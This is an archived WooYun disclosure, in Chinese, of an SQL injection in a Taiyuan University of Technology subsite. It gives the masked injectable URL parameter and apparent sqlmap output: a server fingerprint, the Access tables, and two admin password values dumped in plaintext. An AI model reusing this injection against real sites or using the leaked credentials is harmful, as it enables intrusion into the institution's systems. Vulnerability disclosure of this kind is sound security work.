乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-12: 细节已通知厂商并且等待厂商处理中 2016-01-17: 厂商已经主动忽略漏洞,细节向公众公开
太原理工大学某分站存在sql注入漏洞
注入点:
http://**.**.**.**/zzb/Detail.asp?bigId=1http://**.**.**.**/zzb/Detail.asp?bigId=3
漏洞证明:
http://**.**.**.**/zzb/Detail.asp?bigId=3
web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb[2 tables]+-------+| admin || news |+-------+
Database: Microsoft_Access_masterdbTable: admin[4 columns]+---------+-------------+| Column | Type |+---------+-------------+| id | numeric || keyword | non-numeric || pwd | non-numeric || url | non-numeric |+---------+-------------+
Database: Microsoft_Access_masterdbTable: admin[2 entries]+----+-----+-------------+---------+| id | url | pwd | keyword |+----+-----+-------------+---------+| 1 | <blank> | emd832834+ | <blank> || 2 | <blank> | admin888123 | <blank> |+----+-----+-------------+---------+
过滤。。。。
危害等级:无影响厂商忽略
忽略时间:2016-01-17 18:06
暂无